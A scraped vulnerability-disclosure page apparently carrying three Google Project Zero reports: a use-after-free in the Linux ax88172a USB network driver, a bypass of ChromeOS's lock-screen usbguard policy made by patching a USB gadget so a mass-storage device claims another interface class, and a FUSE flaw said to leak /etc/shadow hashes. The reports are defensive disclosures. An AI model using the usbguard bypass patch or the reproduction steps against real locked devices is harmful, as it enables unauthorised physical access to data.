usbcore(E) scsi_mod(E) cryptd(E) scsi_common(E) drm(E) usb_common(E) video(E) [ 149.360796] ---[ end trace 0000000000000000 ]--- [ 149.362505] ------------[ cut here ]------------ In my test VM with a bunch of kernel debugging enabled, I get this KASAN splat (shown here without guess frames) when I attach the same fake USB device through an emulated HCD: BUG: KASAN: use-after-free in ax88172a_stop+0xab/0xc0 Read of size 8 at addr ffff88800c684e48 by task kworker/0:2/33 CPU: 0 PID: 33 Comm: kworker/0:2 Not tainted 5.17.0-rc4-00054-gf71077a4d84b #949 Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.15.0-1 04/01/2014 Workqueue: usb_hub_wq hub_event Call Trace: <TASK> dump_stack_lvl+0x45/0x59 print_address_description.constprop.0+0x1f/0x150 kasan_report.cold+0x7f/0x11b ax88172a_stop+0xab/0xc0 usbnet_stop+0x13d/0x390 __dev_close_many+0x18c/0x290 dev_close_many+0x18a/0x3f0 unregister_netdevice_many+0x2f8/0x1420 unregister_netdevice_queue+0x1dc/0x280 unregister_netdev+0x18/0x20 usbnet_disconnect+0x118/0x260 usb_unbind_interface+0x182/0x7e0 __device_release_driver+0x531/0x670 device_release_driver+0x26/0x40 bus_remove_device+0x2ae/0x570 device_del+0x490/0xb50 usb_disable_device+0x294/0x600 usb_disconnect.cold+0x1fb/0x68b hub_event+0x1472/0x39d0 process_one_work+0x91d/0x15d0 worker_thread+0x57b/0x1240 kthread+0x2a5/0x350 ret_from_fork+0x22/0x30 </TASK> Allocated by task 33: kasan_save_stack+0x1e/0x40 __kasan_kmalloc+0x81/0xa0 ax88172a_bind+0x95/0x7b0 usbnet_probe+0xa62/0x2370 usb_probe_interface+0x27d/0x760 really_probe+0x475/0xbd0 __driver_probe_device+0x18f/0x470 driver_probe_device+0x49/0x120 __device_attach_driver+0x199/0x250 bus_for_each_drv+0x125/0x1b0 __device_attach+0x1e0/0x3d0 bus_probe_device+0x1a5/0x260 device_add+0x971/0x1a70 usb_set_configuration+0x92b/0x1600 usb_generic_driver_probe+0x79/0xa0 usb_probe_device+0xab/0x250 really_probe+0x475/0xbd0 __driver_probe_device+0x18f/0x470 driver_probe_device+0x49/0x120 __device_attach_driver+0x199/0x250 bus_for_each_drv+0x125/0x1b0 __device_attach+0x1e0/0x3d0 bus_probe_device+0x1a5/0x260 device_add+0x971/0x1a70 usb_new_device.cold+0x47d/0xb88 hub_event+0x20c7/0x39d0 process_one_work+0x91d/0x15d0 worker_thread+0x57b/0x1240 kthread+0x2a5/0x350 ret_from_fork+0x22/0x30 Freed by task 33: kasan_save_stack+0x1e/0x40 kasan_set_track+0x21/0x30 kasan_set_free_info+0x20/0x30 __kasan_slab_free+0xe0/0x110 kfree+0xa5/0x2b0 usbnet_disconnect+0xe7/0x260 usb_unbind_interface+0x182/0x7e0 __device_release_driver+0x531/0x670 device_release_driver+0x26/0x40 bus_remove_device+0x2ae/0x570 device_del+0x490/0xb50 usb_disable_device+0x294/0x600 usb_disconnect.cold+0x1fb/0x68b hub_event+0x1472/0x39d0 process_one_work+0x91d/0x15d0 worker_thread+0x57b/0x1240 kthread+0x2a5/0x350 ret_from_fork+0x22/0x30 If you want to test this yourself, you can use the USB raw gadget (https://www.kernel.org/doc/html/latest/usb/raw-gadget.html) with dummy_hcd. Compile the attached testcase, then run it as \"./usb-ax88172a dummy_udc dummy_udc.0\", wait a few seconds for the device to come up, and press CTRL+C to trigger USB disconnect. This requires CONFIG_USB_DUMMY_HCD=y and CONFIG_USB_RAW_GADGET=y. Found by: jannh@google.com Source

ChromeOS uses usbguard when the screen is locked but appears to suffer from bypass issues. ChromeOS' usage of usbguard is bypassable VULNERABILITY DETAILS ChromeOS uses https://usbguard.github.io/ when the screen is locked (but not on the login screen, perhaps because it is expected that code execution is much less helpful when the disk is still encrypted?). When the screen is locked, a policy is applied that might look like this (example from my Pixelbook): ``` allow id 0bda:564b serial \"\\x07LOE65001063010A78M015CFAI06BF12000\" name \"WebCamera\" hash \"KsByWtMB5JtGNDimauArXMiZOThFwagdTWeQsMAZ48c=\" with-interface { 0e:01:00 0e:02:00 0e:02:00 0e:02:00 0e:02:00 0e:02:00 0e:02:00 0e:02:00 0e:02:00 } with-connect-type \"hardwired\" allow id 1d6b:0002 serial \"0000:00:14.0\" name \"xHCI Host Controller\" hash \"jEP/6WzviqdJ5VSeTUY8PatCNBKeaREvo2OqdplND/o=\" with-interface 09:00:00 with-connect-type \"\" allow id 1d6b:0003 serial \"0000:00:14.0\" name \"xHCI Host Controller\" hash \"3Wo3XWDgen1hD5xM3PSNl3P98kLp1RUTgGQ5HSxtf8k=\" with-interface 09:00:00 with-connect-type \"\" allow id 8087:0a2a serial \"\" name \"\" hash \"AyPZWy2XK0931kB9A/owYfk5xHEqnpDsJfdeLSGIyuk=\" with-interface { e0:01:01 e0:01:01 e0:01:01 e0:01:01 e0:01:01 e0:01:01 e0:01:01 } with-connect-type \"hardwired\" #################################################################################################### # Footer. #################################################################################################### block with-interface one-of { 05:*:* 06:*:* 07:*:* 08:*:* } # physical, image, printer, storage allow ``` As you can see, it mostly just allowlists specific devices with full hashes of the expected USB configuration descriptors, and internal USB devices are marked such that they won't be accepted on external USB ports. (Which, by the way, might not actually be necessary, since the USB subsystem's `authorized_default` flag is set to 2 when the screen is locked, not 0, meaning internal USB devices are automatically allowed anyway?) But then at the bottom is this footer that blocks USB devices with interface descriptors that contain the following `bInterfaceClass` values: - USB_CLASS_PHYSICAL (5) - USB_CLASS_STILL_IMAGE (6) - USB_CLASS_PRINTER (7) - USB_CLASS_MASS_STORAGE (8) Afterwards, anything else is permitted. This configuration footer comes from <https://source.chromium.org/chromiumos/chromiumos/codesearch/+/main:src/third_party/chromiumos-overlay/sys-apps/usbguard/files/99-rules.conf>. The interface-based classification of devices was introduced in <https://chromium-review.googlesource.com/c/chromiumos/overlays/chromiumos-overlay/+/1217622/>. Apart from the problem that there is a large amount of attack surface in drivers for devices that don't belong into those USB interface classes, there is another issue with this approach: The kernel often doesn't care what USB class a device claims to be. The way USB drivers tend to work, even for standardized protocols, is that the driver specifies with low priority that it would like to bind to standards-compliant devices using the proper USB interface class, but also specifies with high priority that it would like to bind to specific USB devices based on Vendor ID and Product ID, without caring about their USB interface class. As an example, USB_CLASS_MASS_STORAGE is blocklisted, so a USB stick inserted while the screen is locked doesn't get past the authorization check: [ 6411.611320] usb 1-1: new high-speed USB device number 31 using xhci_hcd [ 6411.738900] usb 1-1: New USB device found, idVendor=0781, idProduct=5580, bcdDevice= 0.10 [ 6411.738910] usb 1-1: New USB device strings: Mfr=1, Product=2, SerialNumber=3 [ 6411.738916] usb 1-1: Product: [...] [ 6411.738921] usb 1-1: Manufacturer: SanDisk [ 6411.738926] usb 1-1: SerialNumber: [...] [ 6411.740583] usb 1-1: Device is not authorized for usage [ 6414.875133] cros-ec-sensorhub [...] [ 6418.603609] usb 1-1: USB disconnect, device number 31 But if we use a Linux machine with appropriate hardware (I'm using a NET2380 dev board, but you could probably also do it with an unlocked Pixel phone or a Raspberry Pi Zero W or something like that) to emulate a USB Mass Storage device, using <https://docs.kernel.org/usb/mass-storage.html>, and patch one line in the attacker kernel so that it claims to be a billboard, not a storage device: diff --git a/drivers/usb/gadget/function/storage_common.c b/drivers/usb/gadget/function/storage_common.c index b859a158a414..d7452c8458a9 100644 --- a/drivers/usb/gadget/function/storage_common.c +++ b/drivers/usb/gadget/function/storage_common.c @@ -34,7 +34,7 @@ struct usb_interface_descriptor fsg_intf_desc = { .bDescriptorType = USB_DT_INTERFACE, .bNumEndpoints = 2, /* Adjusted during fsg_bind() */ - .bInterfaceClass = USB_CLASS_MASS_STORAGE, + .bInterfaceClass = USB_CLASS_BILLBOARD, .bInterfaceSubClass = USB_SC_SCSI, /* Adjusted during fsg_bind() */ .bInterfaceProtocol = USB_PR_BULK, /* Adjusted during fsg_bind() */ .iInterface = FSG_STRING_INTERFACE, Then we can connect just fine even while the screen is locked - first we get a \"Device is not authorized\" message on the initial connection, then usbguard unblocks us and the kernel probes the device as a mass storage device and scans the partition table: [ 6432.752906] usb 1-1: new high-speed USB device number 32 using xhci_hcd [ 6432.885635] usb 1-1: New USB device found, idVendor=0525, idProduct=a4a5, bcdDevice= 5.17 [ 6432.885647] usb 1-1: New USB device strings: Mfr=3, Product=4, SerialNumber=0 [ 6432.885653] usb 1-1: Product: Mass Storage Gadget [ 6432.885658] usb 1-1: Manufacturer: Linux 5.17.0-rc4+ with net2280 [ 6432.886121] usb 1-1: Device is not authorized for usage [ 6432.891672] usb-storage 1-1:1.0: USB Mass Storage device detected [ 6432.891985] usb-storage 1-1:1.0: Quirks match for vid 0525 pid a4a5: 10000 [ 6432.892090] scsi host0: usb-storage 1-1:1.0 [ 6432.892567] usb 1-1: authorized to connect [ 6433.920354] scsi 0:0:0:0: Direct-Access Linux File-Stor Gadget 0517 PQ: 0 ANSI: 2 [ 6433.922585] sd 0:0:0:0: Power-on or device reset occurred [ 6433.923533] sd 0:0:0:0: [sda] 204800 512-byte logical blocks: (105 MB/100 MiB) [ 6434.030869] sd 0:0:0:0: [sda] Write Protect is off [ 6434.030876] sd 0:0:0:0: [sda] Mode Sense: 0f 00 00 00 [ 6434.136540] sd 0:0:0:0: [sda] Write cache: enabled, read cache: enabled, doesn't support DPO or FUA [ 6434.363462] sda: sda1 sda2 [ 6434.585367] cros-ec-sensorhub [...] [ 6434.588541] sd 0:0:0:0: [sda] Attached SCSI disk I haven't looked at how this issue applies to other USB subsystems in detail, but from a quick glance: - USB_CLASS_PHYSICAL doesn't really show up in the Linux kernel outside of some number-to-string translation table, so I don't think it matters to the kernel. - Same thing with USB_CLASS_STILL_IMAGE. - The usblp subsystem does have an explicit check for USB_CLASS_PRINTER - but that check is intentionally bypassed for known devices that are marked in the kernel as USBLP_QUIRK_BAD_CLASS, and that flag is set for the \"Seiko Epson Receipt Printer M129C\" (vendor 0x04b8, device 0x0202), so you can probably also bypass the blocking of the printer interface class that way. I think the best way forward would be to look into whether it is feasible to rely exclusively on a trust-on-first-use approach. If that is infeasible, you may have to talk to upstream about how userspace can reliably determine which driver(s) a given USB device might be bound to, since I'm not aware of any interface that would let you do that. VERSION Google Chrome 98.0.4758.107 (Official Build) (64-bit) Revision a2ef32d533baed737df9fc2ed8d505405ecf0c66-refs/branch-heads/4758@{#1167} Platform 14388.61.0 (Official Build) stable-channel eve Firmware Version Google_Eve.9584.230.0 Customization ID GOOGLE-EVE ARC 8165997 CREDIT INFORMATION Reporter credit: Jann Horn of Google Project Zero This bug is subject to a 90-day disclosure deadline. If a fix for this issue is made available to users before the end of the 90-day deadline, this bug report will become public 30 days after the fix was made available. Otherwise, this bug report will become public at the deadline. The scheduled deadline is 2022-05-25. Found by: jannh@google.com Source

Linux suffers from a vulnerability where FUSE allows use-after-free reads of write() buffers, allowing theft of (partial) /etc/shadow hashes. Download: GS20220419150818.tgz (6.4 KB) Source